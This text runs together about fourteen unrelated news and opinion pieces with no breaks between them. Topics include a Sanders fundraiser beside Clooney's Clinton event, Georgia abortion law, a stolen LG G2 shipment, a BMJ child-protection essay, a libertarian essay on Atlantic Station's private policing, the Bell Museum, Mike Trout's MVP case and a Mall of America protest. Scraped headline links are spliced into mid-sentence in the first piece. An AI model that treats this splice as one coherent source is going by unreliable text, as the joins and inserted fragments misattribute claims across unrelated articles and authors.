George Clooney's next door neighbor held his own fundraiser — to benefit Bernie Sanders Bernard (Bernie) SandersPush to end U.S. support for Saudi war hits Senate setback Sanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' MORE — during the actor's posh Hollywood soiree Saturday night with Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesman: Clinton staff are 'biggest a--holes in American politics' MORE.
ADVERTISEMENT
Howard Gold, whose family founded the 99 Cents Only store chain, called his bash the “99% Party,” with tickets selling for $27 per person.
An email invite sent to Sanders supporters Saturday reads: “Swimming pools, Movie Stars, and merriment for all! This is happening right next door to Clooney's party for Hillary!"
The invite also notes that "no-one (will be) turned away for a lack of funds."
Hollywood's power brokers, meanwhile, have spent weeks selling high-dollar tickets, starting at $33,400 per person, to the Clooney event in Studio City. Co-hosts include Jeffrey and Marilyn Katzenberg, Steven Spielberg and Kate Capshaw and Haim and Cheryl Saban.
Gold's event turned into a pool party, pro-Sanders event and Clinton protest. As Clinton's motorcade arrived on the street headed to the Clooneys,' protesters showered her car with $1 bills.
ATLANTA (Reuters) - Georgia Governor Nathan Deal signed into law two pieces of legislation on Tuesday to restrict late-term abortions and outlaw assisted suicide in the state.
The first law banned most abortions after 20 weeks' pregnancy, making Georgia the eighth U.S. state to outlaw most late-term abortions based on controversial research that a fetus can feel pain by that stage of development.
Georgia already prohibits most abortions starting in the third trimester.
The second law signed by Deal made it a felony to help people take their own lives. The Georgia Supreme Court in February struck down as unconstitutional a previous law that outlawed the advertising of assisted-suicide services. The court ruled the old law was a violation of the right to free speech.
The abortion measure passed by the Republican-controlled Legislature in late March included exceptions to save the life of the mother and if the fetus has extreme defects that make survival unlikely.
“This legislation provides humane protection to innocents capable of feeling pain, while making an important exception for in the case of medically-futile pregnancies,” Deal, a Republican, said in a statement.
Georgia Right to Life, which opposes abortion, has called the new legislation “a step in the right direction,” but expressed disappointment at the exemption for “medically futile” pregnancies in which the fetus is likely to die after birth.
Abortion opponents said the exception left the door open for a doctor to recommend abortion of fetuses that are less than completely healthy.
Planned Parenthood, which provides women's health services and is the nation's largest abortion provider, said the bill would limit women's access to healthcare.
The organization said in a statement that the bill “calls into question every woman who makes a deeply personal, private medical decision.”
Georgia joins Alabama, Idaho, Indiana, Kansas, Nebraska, and North Carolina in banning most or all abortions after 20 weeks. Arizona bans most abortions after 18 weeks.
The U.S. Supreme Court legalized abortions in 1973 but allowed states to ban the procedure after the time when the fetus could potentially survive outside the womb, except where a woman's health was at risk.
The assisted suicide ban was welcomed by Georgia Right to Life President Dan Becker, who said “stopping the immoral and barbaric practice of killing in the name of compassion is the right thing to do.”
Ahmad Bradshaw has been a bystander during the free agency carousel to this point. That might be about to change.
Free-agent tracker NFL free agency is underway. Follow all of the latest player rumors and signings in our free-agent tracker. NFL free agency is underway. Follow all of the latest player rumors and signings in our free-agent tracker. More...
NFL.com's Ian Rapoport reported Tuesday night that Bradshaw is set to visit the Steelers on Thursday, according to a source. Rapoport reported that Bradshaw could fly in to Pittsburgh on Wednesday night, but his visit and physical evaluation will happen Thursday.
If he's recovered from offseason surgery, Bradshaw would be a perfect fit for a Steelers team in need of some fresh talent in the backfield. Although doctors cleared him for OTAs, his health remains a question mark.
CBSSports.com's Jason La Canfora first reported the news of Bradshaw's visit.
Wary of a bad medical report sabotaging his attempts to catch on with a team, Bradshaw chose to wait on visiting teams until his foot was further along. Bradshaw represents a potential steal in free agency, and he would fit well in Pittsburgh's offensive scheme.
Follow Dan Hanzus on Twitter @DanHanzus.
Real world applications are the next step for blockchain TE-FOOD Blocked Unblock Follow Nov 29, 2017
Idealist visions vs established businesses Until now, very few ICOs were launched by companies with an existing product, let alone a decent market share in their business. But recently, it seems companies with existing, successful operations start turning to token sale to collect funds. Kik, the messaging platform with the Kin ICO, or esports betting site Unikrn with UnikoinGold are among the few ICOs with noticeable user base. Finally, the B2B sector also notices the opportunities of the blockchain community with the TE-FOOD token sale to start in December. TE-FOOD is the world's largest farm-to-table fresh food traceability system, currently implemented in Vietnam. It is used by more than 6,000 companies, tracks 10,000 pigs, 200,000 chickens, and 2,500,000 eggs each day, 7 days a week, from farms to retail, serving a region of 30 million people with food history insights. Making the food origin information transparent to the customers is an important attribute of TE-FOOD's multi-channel approach: It integrates all participants of the food industry by providing tools and information for the supply chain participants, the authorities, and the consumers as well.
Real world applications are the next step for blockchain Embedding blockchain in real world business applications like traceability is definitely the next step in the penetration of decentralized technologies, but it's a tough one. Despite the plenty of base protocols and fintech projects, blockchain is still the territory of progressive IT guys and fintech enthusiasts. Beyond them, a few people have a clue what blockchain is. That's why such a project requires careful planning, and a lot of customer education. To let people accept blockchain, you have to package it into familiar processes, while offering education about its possibilies, and correcting the misbeliefs. To develop software for a bitcoin exchange, or a new wallet is a pure virtual project. But food traceability is done in the real world, in farms, slaughterhouses, and wholesale markets. Technology is not enough here. A successful project needs a proper implementation methodology: Helping the government to create efficient regulation and enforcement structure, convincing supply chain participants to cooperate, training tens of thousands of supply chain workers, proper communication to gain support of NGOs, and working together with large conglomerates to connect their existing identification schemes are as many important tasks as coding smart contracts properly.
Build a Flavor Foundation
Aromatics are combinations of vegetables and herbs (and sometimes even meats) that are heated in some fat – like butter, oil, or coconut milk – at the beginning of a dish. The heated fat helps these ingredients release addictive aromas and impart deep flavors into the dish that's being cooked.
Sauces, braises, curries, rice dishes, sautes, stir-fries, soups, stews, and stocks all typically start off with aromatics, which help form the flavor foundation of these dishes. Try making a soup without onions. You'll notice that it just doesn't taste as sweet. Or cook a curry without garlic and ginger. It'll feel a bit empty.
But now that you know about aromatics, you won't ever have to worry about your dish lacking in anything!
There are 2 simple rules for how to prep or chop aromatics:
1. FISHING THE AROMATICS OUT OF THE FINAL DISH
If you plan on fishing the aromatics out of the final dish, like in a stock, don't worry too much about the chopping. Halve the onion or chop a carrot into 3 or 4 pieces, but there's not need to worry about the fine knife work. You can even throw a whole sprig of thyme in – the leaves will come off and you can easily remove the stem before serving.
2. KEEPING THE AROMATICS IN THE FINAL DISH
If the aromatics will be a part of the final dish, then you'll want to finely dice or chop them. The extra surface area means they'll release more flavor in a shorter time, plus the smaller size means it'll melt into the texture of the final production.
Learn how to prep some of our most commonly used aromatics with these videos:
Alain Gregoire , clinical director for mental health and learning disability , Simonetta Agnello Hornby , family law solicitor 1South Central Strategic Health Authority, Southampton, UK 2London, UK Correspondence to: A Gregoire alaingregoire{at}nhs.net
Alain Gregoire and Simonetta Agnello Hornby argue that child protection fails to detect many children in need of help while becoming ever more bureaucratic and unhelpful, while Margaret Spinelli and Louise Howard (doi:10.1136/bmj.d3063) believe that child protection interventions are essential to prevent child abuse
“Madness,” in both popular usage and in its now outmoded professional sense, is characterised by beliefs that are out of touch with reality or contrary to evidence, that are associated with negative emotions and unhelpful behaviours, and that impair functioning. The term is an apt descriptor for our society's efforts in child protection.
Apart from the dramatic failures that result in inquiries and accusatory headlines, child protection processes fail to detect 90% of the cruelty experienced by children[1] and let down high risk groups such as disabled children.[2] The surprise at the failings and the blind eye turned to the inadequacies reflect an almost delusional belief in the potential of ever more bureaucratic processes to protect our children from harm by detecting maltreatment and stopping it.[3]
We have lost touch with the reality of what matters for children's wellbeing, well defined by Unicef: “The true measure of a nation's standing is how well it attends to its children—their health and safety, their material security, their education and socialization, and their sense of being loved, valued, and included in the families and societies into which they are born.”[4] Most children identified as being in need in relation to such issues do not become subject to child protection plans,[5] and they often receive little or no support. Our growing emphasis on child protection for those already neglected or abused has distracted us from taking action on the underlying causes, which are well known. Even worse, we are spending more and more on responding to the social consequences, largely through the criminal justice system, which will do nothing to stem the tide of social problems. Sweden and Finland spend 50% more of their gross domestic product on children and families than we do; we spend 200% more than they do on social problems.[6]
Our emotional responses swing dysfunctionaly between disinterested complacency at child poverty to indignant, punitive outrage when social workers fail to prevent severe abuse. Our society's behaviour towards children is absurdly paradoxical: pious statements by politicians to stamp out child maltreatment are coupled with the youngest age of criminal responsibility in the developed world (apart from some US states), 10 year olds facing trial in adult courts, and more children in prison than any other western European country.[7] We also imprison the parents of over 160 000 children without providing specific support services or parenting interventions. At an individual level, the preoccupation with child protection may now be driving dysfunctional attitudes and behaviours between the generations, including fear, suspicion, and avoidance.[8]
Failure of system The impact of this loss of touch with reality on our functioning is severe. On multiple measures the UK has the worst child wellbeing of all the 21 richest nations in the world (for example, poverty concentrated in families with children, high proportion of low birthweight babies, fifth from bottom in educational wellbeing), and, not surprisingly, our children are the unhappiest.[4] Perhaps the underpinning factor to all the others is that our children have by far the worst family and peer relationships of all the world's richest nations. Even if we select only the extreme indicators of wellbeing we are failing to protect our children from risks: our children carry, by a large margin, the worst levels of risks among the world's 21 richest nations. This includes measures such as involvement in violence; experience of bullying; use of alcohol, tobacco, and illicit drugs; underage and unprotected sex; and teenage pregnancy. Worst of all are the outcomes for the children we claim to have protected by removal into state care. Both objective measures of outcome and children's experiences reveal that we continue to fail these children to a degree that would justify their removal from our care.[9] [10] We live in one of the most unequal and divisively class ridden societies in the developed world. Far from breaking intergenerational cycles of disadvantage, we have low and falling levels of social mobility coupled with inequitable education and health. Our poorest, most vulnerable, and most disadvantaged children are the first to become parents themselves. Despite the current poor prognosis, effective treatment is possible. Firstly we must cease our dependency on the symptomatic relief apparently offered by child protection: those countries with the strongest emphasis on this have the highest death rates from child maltreatment. The lowest rates are found in those countries that invest in families and prevention.[11] We must shift from child to family focused policies and invest in cost effective early (pre-birth) interventions targeted at the most vulnerable families, attending to the emotional and social wellbeing of parents and children.
Notes Cite this as: BMJ 2011;342:d3040
Footnotes Competing interests: All authors have completed the Unified Competing Interest form at www.icmje.org/coi_disclosure.pdf (available on request from the corresponding author) and declare no support from any organisation for the submitted work; no financial relationships with any organisation that might have an interest in the submitted work in the previous three years; and no other relationships or activities that could appear to have influenced the submitted work.
CNET
Talk about your hot phone.
A truck containing 22,500 LG G2 smartphones was stolen on the way to its destination in Louisville, Ky., CNET has learned. The phones were on their way to Sprint, which is expected to launch its version of the G2 early next month.
The phones were stolen at 6:30 p.m. Thursday at a truck stop in Gary, Ind., an LG representative confirmed to CNET. The driver left the truck for a bathroom break, and upon returning, found the vehicle missing.
The Indiana and Illinois state police have been contacted, as well as the FBI.
The G2 is LG's flagship device, and has stood out in the market with its unique volume and power button located at the back of the smartphone, right under the camera. It's a controversial change that has met with mixed reviews.
The G2, like other flagship phones such as the Galaxy S4 , iPhone 5S , and HTC One , was released on multiple carriers, with Sprint among the later carriers to sell the device.
Now playing: Watch this: The powerful, blazingly-fast LG G2
The ceremony witnessed Secretary Karachi Press Club, civil society members and politico-religious leaders.
The participants commemorated Pakistan's Independence vowing to defend this great nation and its ideology put together by its illustrious founders. The day reminded them of their martyrs, paying tribute to their sacrifices. Scores were sacrificed to ensure the foundation of this nation and many a martyred in migration, ones in attendance decided to ensure that they were remembered saluting their efforts.
While talking to the press, the leaders appreciated all that were involved in the struggle not to mention Quaid-e-Azam, Allama Iqbal who gave up on all to give us this wonderful country. They cherished the nation which helps and supports the cause of Palestine. They anticipated that this nation who not forgo the Oppressed Palestinians in their dire time. Recollecting the leaders quote on Palestine, they pre-empted that nation, following their footsteps, will defeat every conspiracy brought in by the Zionist regime of Israel and India.
Dignitaries present during the ceremony included; secretary of Karachi Press Club Maqsood Yousofi, Members of provincial assembly sindh belongs MQM Pakistan Dr.Mahfooz Yar Khan Adv, Maj (r) Qamar Abbas, Former Member of Parliament and leader of Jamat-e-Islami Muzaffar Hashmi, Senior Leader of PPP Rashid Hussain Rabbani, Secretary General of Palestine Foundation Pakistan Sabir Abo Maryam, Qazi Zahid of PMLN, Israr Abbasi and Erin But of PTI, Allama Aqeel Anjum of JUP, Matloob Awan Qadri of APST, Naeem Qureshi President of Karachi Bar Association, Allama Amin Ansari and Allama Abdul Khaliq Fareedi of MUM, Syed Shabbar Raza of JAP, Khalid Akhter of HRN, Farhad Gul from JIY, Maaz Chishti a well known scholar, Abdul Waheed Younis of JUP and others.
Source
“All the common areas of Atlantic Station including the streets, sidewalks, parks, and alleys are private property.”
Thus reads one line buried in the Rules of Conduct for Atlantic Station, Atlanta, Georgia: a marvelous city within a city. But it's this one line that makes the critical difference. It's why this one-square mile in the heart of this great city has done more to model beauty, prosperity, diversity, and happy living than 50 years of “urban renewal” and other government programs.
The entire community was built on top of the old Atlanta Steel Mill, which opened in 1901 and closed in the 1970s, leaving desolation in its wake. Atlantic Station opened 10 years ago as a visionary entrepreneurial venture — the brainchild of The Jacoby Group, headed by Jim Jacoby — funded mostly with private money (the city helped with tax breaks and some infrastructure funding).
It is not a gated community walled off from the public for only the elite. There is no charge to get in. Everything is public access, and subject to all the laws governing commercial property. The difference between the public and private city, however, is huge.
You can tell when you have entered the space. Whereas many areas of Atlanta struggle, this area in the heart of the city is clean, bright, ebullient, bustling with enterprise and life.
On an evening recently, on the way to the movies in the spectacular theater there, I sat outside on the patio of a Mexican food restaurant and watched adults and children playing games and having fun on the green space that serves as a mini-park in the middle of this urban experiment in capitalism. There were people from all races, classes, and ages. They listened to the live band and sang along.
As I sat there, I was suddenly overwhelmed with the sense of a mini-utopia. It's like an idealized scene you see in a commercial for soda or some happy vacation getaway. It was one of the most blissful city scenes I've ever witnessed.
It was a typical evening, and it was all taking place in a place that was, only twenty years ago, a burned out, low-rent disaster zone, the kind of place people flee. Now, the migration patterns have changed. Atlantic Station is a place where you want to live and work.
I was walking along and a uniformed police office greeted me good evening. I responded with delight, and we had a nice conversation. She wanted to know if I was enjoying the evening, made a few bar recommendations, we chatted about the weather, and I went on. She was uniformed, yes, and probably armed, but in a non-threatening way. She looked sharp and helpful, as well as official.
Then it struck me: the police in the community are privately employed by main stakeholders in the community, which are the merchants, apartment owners, and other service providers. (The streets are also private but public access.) For this reason, the police themselves have a deep investment in the well-being of the community and the general happiness of the consumers who shop there. They are employees of the free enterprise system. In particular, Atlantic Station owners contract with Chesley Brown for experienced service.
Sometimes in today's overly-militarized environment, it is easy to forget: policing is a completely legitimate, useful, important profession. They are there to make sure that everyone is keeping the rules and to apprehend the vandals and criminals who break the rules. You might even call them the thin-blue line.
What makes the difference here is the private nature of the contract that employs them. Just as every other employee in this community, they have a direct stake in the value of the space. They are there to serve customers, just as every merchant in this community does.
The more valuable the community, the more valuable their own jobs. They have the incentive to do their job well, which means enhancing the experiences of rule keepers while driving out those who do not keep the rules.
The rules for Atlantic Station are rather strict, more so than I would have thought. There is a curfew for teens. You can't wear gang-related or obscene clothing. You can't carry weaponry. You can't use indecent language. You can't smoke. You can't be boisterous. You can't shout or be vulgar. You can jog, but you can't just take off running through streets like an animal.
If rules like this were imposed by a city government, people would rightly complain about the violation of rights. So why aren't these rules violations of rights? Because it is private property and the owners determine them.
More importantly, the point of the rules is not to control people and run their lives; it is to enhance the value of the community for everyone. They can be changed depending on circumstances. They can be imposed strictly or not. It all depends on what's best for Atlantic Station, and, yes, what's best for business.
But you know what's interesting given all the rules? You don't really feel them. They are not really posted anywhere. You just sense that they exist, and you feel a desire to behave well. The culture of cooperativeness and good behavior is ever present. And the rules have the effect of freeing you from annoying things, not restricting your behavior. It doesn't feel like an imposition. It feels orderly. The rules are enforced but with gentleness and care.
The first time I entered Atlantic Station was about 18 months ago. I had some sense that something was different about the place, but I hadn't understood that it was entirely private. I stepped out on the sidewalk and lit up a cigarette. One of these very nice private policeman came up and greeted me and politely asked me to put it out, on grounds that this was against the rules in this private community. I said, you mean by this building? He said, no, for the whole community.
I didn't resent it. In fact, I was delighted to comply. I even thanked him for being so kind. There were no tickets, no yelling, no moments of intimidation. No one is taking your stuff, threatening to arrest you, or even giving you tickets. You have the right of exit. The rules themselves become part of a larger market for rules.
Another interesting feature is how Atlantic Station has marketed itself. It is not seen as an experiment in capitalist living. All the promotion uses all the usual lefty buzzwords about energy efficiency, sustainability, diversity, renewable this and that, certifications by various green groups, and so on. None of it matters in the slightest. This is about private property. Period. It's ownership that realizes the ideals, whatever they are.
The lesson I derive from all of this is that institutions matter. You can have the same principles and laws in two places, one enforced publicly and one enforced privately. The code of conduct can be identical, but the results can be completely different.
Where monopolistic, tax-funded enforcement can be cruel, inflexible, and violent, the same enforcement brought about within the matrix of an exchange economy can yield results that are humane, orderly, and beautiful. The right to just walk away makes all the difference.
The implications for policing are perhaps the most interesting, given the current controversy over police abuse. When the police function is part of the market order, the phrase “to serve and protect” takes on substantive meaning. It's this feature of public vs. private property that is decisive.
There must be many of these communities appearing around the country. Governments at all levels are out of ideas and out of money. When was the last time you heard of some hugely expensive urban renewal program, or massive public housing structure, that was to be built in a major city?
These visions are less and less part of our lives and our future, thankfully. With governments bowing out of the planning business, private enterprise is increasingly moving in with real efforts at restoring community.
Private enterprise is gradually bringing about what governments only promised to do, and it is happening without much fanfare. In fact, I've not seen a single headline story about this community, whereas there should be thousands that read something like “Private commerce saves Atlanta!”
Private property and inclusive commerce: it's the magic sauce that makes life beautiful. Come to Atlantic Station and see for yourself.
Minnesota's favorite stuffed moose is getting ready to move.
The Bell Museum and Planetarium will unveil architectural plans and hold a celebratory groundbreaking this weekend for its new $79 million museum project in St. Paul.
The small natural history museum is housed in a charming but cramped 1940s-era building in the heart of the University of Minnesota East Bank campus. It will migrate — along with its historic taxidermy dioramas — to a new facility on the corner of Larpenteur and Cleveland avenues on the St. Paul campus, set to open late summer of 2018. The new space will include a state-of-the-art digital theater functioning as the first public planetarium in the Twin Cities since the one in the former central Minneapolis Public Library was torn down in 2002.
“I've been a curator at the Bell the last 15 years,” said George Weiblen, a biology professor and the Bell's interim scientific director. “I can remember during my job interview in 1999 when the director at that time talked about the need for a new Bell Museum. It's exciting to be at this point, to be finally emerging from the shadows into the light of day.”
EVIDENCE OF ORIGIN OF LIFE, FROM RIGHT HERE
At 92,500 square feet, the new two-story building will be only 10 percent larger than the current one, but it will be air conditioned, configured for modern needs and able to present Minnesota's natural world in new ways, with the goal of doubling attendance to more than 100,000 visitors each year. The exterior will be clad in white pine and steel, a nod to the state's natural resources. Related Articles Bell Museum celebrates art and science with the Bell Social
Rare deal at Capitol gives Bell Museum new home on U's St. Paul campus
Family Outings: Mini-planetarium show asks ‘Is there life on other planets?'
Bell Museum to add planetarium
Bell Museum offers ‘science nerds' a place to celebrate love
The five-acre site will include a large parking lot and landscapes with beehives, pollinator gardens, rock samples, solar panels and a pond, which will help the museum keep 95 percent of its storm water on site. A separate entrance for school buses could double the number of field trips. The building, designed by Minneapolis architectural office of Perkins + Will, will be flooded with light through floor-to-ceiling windows using bird-safe glass.
“That was one of the early requirements,” said chief operating officer Steven Lott, part of the team leading the Bell as it searches for a new director. “Considering we have ornithologists on staff, well, we're not going to not have bird-safe glass. It would go against who we are.”
At the heart of the building is the 120-seat planetarium, a massive concrete cylinder that forms one curved wall of the main lobby. A staircase will sweep along one side leading to 19,000 square feet of permanent exhibit space on the second floor.
The exhibits themselves will incorporate the Bell's additional new focus on space education. The first gallery will start with the Big Bang and explain the formation of Earth.
“What is little appreciated is that some of the best evidence we have for origin of life is here in Minnesota in some of our oldest rock,” Weiblen said. “We have 500 million-year-old limestone formations loaded with spectacular forms of sea life. We're going to interpret this cosmic and deep earth history through the lens of Minnesota.” Other displays will showcase early flora and fauna.
“It's not the Minnesota you'd expect to see, but it's Minnesota of 10,000 years ago when ice was receding and there were mastodons and saber tooth cats,” Weiblen said. “It's part of our message: Nature is changing all the time. And we're a part of that.”
DIORAMAS IMPROVED, AND ARE STILL THE STARS
Weiblen calls the museum's dioramas its “crown jewels” and they will be given star billing. But rather than displayed one after another along the sides of a dim hall, they will highlight Minnesota's three major habitats. So the big moose will stand tall amid interactive displays about the diversity of the northern coniferous forests; the fuzzy gray prairie vole might hang out with animals and plants from the prairie grasslands.
The museum will keep intact 10 large dioramas by Francis Lee Jaques, who grew up in Minnesota and went on to paint dioramas at the American Museum of Natural History in New York City. A handful of others may also be preserved as they are, but many will be stored or dismantled to use in other ways.
The animal migration will be expensive. In January, a preservation team practiced taking apart and preserving the Dall sheep diorama, the only species in the museum not native to the state, and for that reason, offered as a sacrificial lamb to allow the team to perfect its technique. The Bell figures it will take about $7 million to disassemble, preserve, move and reinstall the dioramas with new interpretation.
“It's going to cost us more money than what we had allocated,” said Beverly Anglum, chief development officer and director of advancement.
In fact, everything is going to cost a bit more than anticipated, so the Bell is formally kicking off its $15 million capital campaign this weekend to raise money for exhibits, furnishings and programming. This is in addition to $6 million in private money that has trickled in over the years. A 2014 state legislative deal approved $51.5 million for the new Bell. The University, which runs the museum, later kicked in an additional $6.7 million.
“Over the last 10 years it's had starts and stops,” Anglum said. “The bonding legislation really helped to give this project legs. Now we're in a much better place to raise the $15 million. It's become real for people.”
IF YOU GO
The Bell Museum of Natural History unveils plans for its new building and celebrates Earth Day. Stop by Friday, Saturday or Sunday for ExploraDome shows in the mini-planetarium, migratory bird programs, the Hungry Planet exhibit; 10 a.m.-5 p.m. Saturday; noon-5 p.m. Sunday.
All the MVP arguments that can possibly be made have already been made, at least twice, and I don't intend to make them here again. You probably have a sense for what you think "Valuable" means, and if you don't, you can certainly read about all the possible interpretations elsewhere. Instead of relitigating those arguments, I want to talk about Mike Trout. Not to make the case for him winning the 2016 MVP – BtBS managing editor Neil Weinberg did so quite capably yesterday over at FanGraphs – but to point out how ahistorical the combination of his run of league-wide dominance and lack of BBWAA recognition has been.
As Neil explains in that piece, Trout looks to be fairly comfortably in the lead with whatever WAR metric you choose, and in the lead with whatever other overall value metric you choose. If that remains true for the last month of the season, it will be his fifth consecutive year leading the AL in fWAR. And if Josh Donaldson or Mookie Betts or Jose Altuve wins the MVP instead of Trout, as seems likely, the Angels outfielder will have been recognized for his dominance only once in those five years. This is, succinctly, nuts.
It's nuts, first of all, because Mike Trout is incredibly good. We talk about this all the time, and it's still not nearly enough. Trout used to be heralded as the best young player since Mickey Mantle, but through their respective age-24 seasons, he leads Mantle by 5.5 fWAR, and he still has a month to open that gap up further. He's currently in second place, only .6 fWAR behind Ty Cobb for the most fWAR through 24 ever, a total basically every projection system expects him to surpass before October. Trout has surpassed every comp. This paragraph is of questionable relevance to the article, but whatever.
If you compare him to players of any age rather than only his youthful peers, Trout is merely in the highest tier of performance, rather than a class of his own. Since 1931, when the MVP award took its modern form, the only other batter to lead their league in fWAR for five years in a row is Mantle, from 1955 through 1959. The only players who led their league for four consecutive years were Willie Mays, from 1962 though 1965, and Barry Bonds, who somehow did it twice with seven years of separation in the middle, in 1990–93 and 2001–04. Those are Trout's reasonable comps.
So how did they do in MVP voting? Very well. In Mantle's five-year run, he won the MVP in years two and three (1956 and '57), his best years of the five. He did get egregiously shorted in 1955, when Yogi Berra took the award despite a 4.6-fWAR deficit, and in 1958, when Jackie Jensen got the nod with only 5.5 fWAR to Mantle's 8.8, but he led the league by less than half a win in 1959, so two wins over that span isn't bad. While Mays got denied in the first three years of his run, one of those losses was to Sandy Koufax, and the complications that pitchers add to the MVP calculus make calling it undeserved somewhat difficult. And Bonds? He absolutely dominated the vote in both of his stretches, winning in three of the first four years and all four of the second four.
If we loosen the requirements and look to players with many nonconsecutive years as their league's fWAR leader, there are more examples of well-deserved dominance of the MVP race. Ted Williams led the AL in 1946, 1947, 1949, and 1951; he won in '46 and '49. Albert Pujols led the NL in 2006, 2008, and 2009, winning in the latter two (as well as 2005). And, in perhaps the most compelling comparison, Alex Rodriguez sat atop the AL in fWAR for six of the ten years from 1998 through 2007, and while he didn't win the MVP in any of his first three years as leader, he did win it in each of the last three.
Jim McIsaac/Getty Images
The conclusion of all of this? The idiosyncrasies of the BBWAA voting process, and the deliberate vagueness of the instructions, make the outcome of the MVP race in any given year very difficult to predict. But when a player is at the top of the league for several years in a short span, they're nearly guaranteed to walk away with multiple wins. Unless that player is Mike Trout, apparently.
Why? I can think of two plausible explanations. The first is that MVP voting is weird, and in a given set of five years, someone was going to get denied like this at some point, in the same way that, if you keep flipping a coin, it's bound to come up heads five consecutive times at some point. This is possible, if unsatisfying, so I'm going to ignore it. The second is that Mike Trout has been unique among excellent players, in that his team has let him down. I wrote that article after 2015, another year in which the Angels didn't make the playoffs despite having the very best player in baseball, and 2016 is just adding to that tally and making the pattern even more ahistorical. Most of the players I mentioned saw their teams reach the playoffs numerous times in their stretches of dominance, since, y'know, they're great players. I think this is the most likely, disappointingly mundane reason why Trout has been so uniquely ignored by the BBWAA: The Angels have been crappy.
The MVP matters only because we say it matters, so it's not worth getting too much into knots over. Trout is outstanding, truly excellent in a literally unprecedented way, and that's true whether the BBWAA votes for him or not. If they don't, hopefully it helps people realize that the MVP isn't quite living up to its ideals and shouldn't really be taken seriously.
. . .
Henry Druschel is a Contributing Editor at Beyond the Box Score. You can follow him on Twitter at @henrydruschel.
Its been many months since I last played Gigantic and I left at a time when its developer, Motiga, was in precarious territory. With staff redundancies, limited funds and no clear path to release, it was with relief that Arc Gaming game to their rescue. Six months on (if not a little more) is Gigantic better off and are we any closer to seeing a launch? I thought I'd take a quick look.
I have to admit I've missed Gigantic. There's nothing like it on the market, from a gameplay and aesthetic standpoint. It's beautiful to look at and has some of the best art direction I've ever seen. Although it shares many similarities to other games on the market (its effectively a team based arena brawler with limited action sets) it offers much more than that. Where Battlerite only has combat, or Paragon finds itself chasing a MOBA design, Gigantic does away with all this. Instead, it has a unique system that sees players gather Power for their respective Guardian, before it then rampages across the map.
It sounds relatively simple, but there are many ways that not only go into powering up your Guardian, but also preventing the enemy from powering theirs. The use of Creatures to protect Control Points, the ability to upgrade them, and the exchange of power if you kill or be killed all goes into one big pot. The end result, combined with the fast pace and slick visual effects, is a game that has a rapid pace with a great deal of personal skill required.
While much of the above has always been "Gigantic" - certainly for as long as I've played it - it's clear that Motiga have spent a great deal of time and effort polishing the game and refining the Power system. Where the user interface was once placeholder and with the Guardian rampage mechanic relatively confusing (certainly for a new player) both have been streamlined and I assume, finalized.
The new user interface is wonderful and not only does an incredible job of relaying a great deal of information, but it perfectly suits the existing art style. Unquestionably one of the most difficult things about Gigantic is understanding how much Power your Guardian has, how much the enemy has and what is actually providing that Power. Cleverly Motiga have found a solution to this with a rather slick interface, at the top of the screen, that relays in real time what's being generated.
The loading screen now has a flashy new look.
From a gameplay perspective this issue alone was one of Gigantic's biggest hurdles, and the game is instantly better for remedying it. Not only that, but there's now a whizz of fantastic graphics to signify your Guardian is on the attack. Interestingly, final animations have also been added to Guardians that seem themgrapple one another for supremacy during a rampage, providing an amazing visual display that has bite and real “oomph”. It's the level of detail both Guardians desperately needed in order to come alive and feel part of the overall battle.
So what about the rest of the game? Well, it still only has the same three maps but they're all exceptional and offer very different approaches to how you need to build your team. Ghost Reef has undergone a few more minor changes to its layout and is much better for it, while Siren's Strand is now complete: it's a truly brilliant map. As with everything in Gigantic, all the maps look and feel fantastic and with more in the works (including the possibility night time variants), the lineup should look rosy for launch.
As far as heroes are concerned, Pakko has officially launched (yet again wonderfully designed) with Zandora right around the corner. There's also a host of frost themed skins and creatures that have been added to a storefront that, overall, is looking very polished.
The newly added Fortunate Card artwork is beautiful.
If there's anything of concern with Gigantic right now, it's simply that its integration with the Xbox Live app is relatively wonky. I'd like to see everything undertaken solely within the client, but for now it often requires doing simple things such as inviting a teammate through Xbox Live as opposed to in the game itself. Not only that, but basic features such as adding someone to your friends list after a match, reporting an AFK player, or talking in the lobby (or even the match itself) are totally missing.
For a game so reliant on communication and team work, it's odd that lobby and in-game chat still hasn't returned and in many ways this lack of knowledge sharing does seem to manifest itself in how people are playing. While the tutorial does a reasonable job of providing the information players need, there are nuances and complexities to the ebb and flow of Gigantic that can't be tutored in such a rigid environment. Having players being able to chat in the lobby would do wonders for sharing information, tactics and tips.
Besides the above, I've never seen Gigantic in better shape and it feels more than ready to launch. It remains fast paced, frantic at times, tense and with a great deal of skill necessary to succeed. There's still improvements to be made with Hero balance, (crowd control, the ease of mobility on some Heroes are far too strong) but that's entirely natural for a game that's in Beta with new Heroes still entering the roster.
What's surprised me the most (well, probably not actually) is the fact I've instantly abandoned all my go-to games once again. Instead, I've been filling all my spare time playing Gigantic. There's just something about it that's compelling and unique and if you have any love of competitive games, it's a game you should be gravitating towards. Considering it's also free (but requiring Windows 10 or an Xbox right now) if you have either, you should definitely pick it up.
You can visit the official Gigantic website here.
INVERNESS, Scotland, Jan. 10 (UPI) -- Researchers in Scotland are going to try to determine if the side effects of type 2 diabetes can be managed through a diet full of oat-rich cereals.
The Scottish government's Chief Scientist Office is providing $305,000 to finance a 16-week trial involving 60 volunteers. Researchers based in Inverness and Aberdeen will conduct the study, the BBC reported Friday.
The oats-diabetes study was organized by researchers at the University of the Highlands and Islands, the University of Aberdeen and the Rowett Institute.
"The aim is to develop new dietary plans which could improve diabetes control, delay the need for people with type 2 diabetes to start tablets or insulin to control their blood sugar, and potentially reduce the risk of some of the complications of diabetes," said UHI Professor Sandra MacRury, who works at the school's Department of Diabetes and Cardiovascular Science.
The Mall of America Rotunda was filled with Black Lives Matter protesters on Dec. 20. The mall did not sanction the event and asked the crowd to disperse amidst boos from the protesters.
What's the difference between being told to "disperse" and being ordered to "leave?" One might get you convicted of trespassing at the Mall of America. The other will not.
That explains why Bloomington prosecutors have dropped trespassing charges against the organizers of a Black Lives Matter protest at the Mall of America in December. While mall officials that day told the group repeatedly over a loudspeaker that the demonstration was unauthorized, they forgot to use one key word: leave.
"For a good trespass case, somebody in a position of authority must tell you you have to leave the property," Bloomington City Attorney Sandra Johnson said Wednesday.
The mall's announcement simply told the crowd to "disperse," said University of St. Thomas Law School Professor Nekima Levy-Pounds, who helped organize the protest.
"Disperse means to spread or to spread out," she said, "and that's what we did."
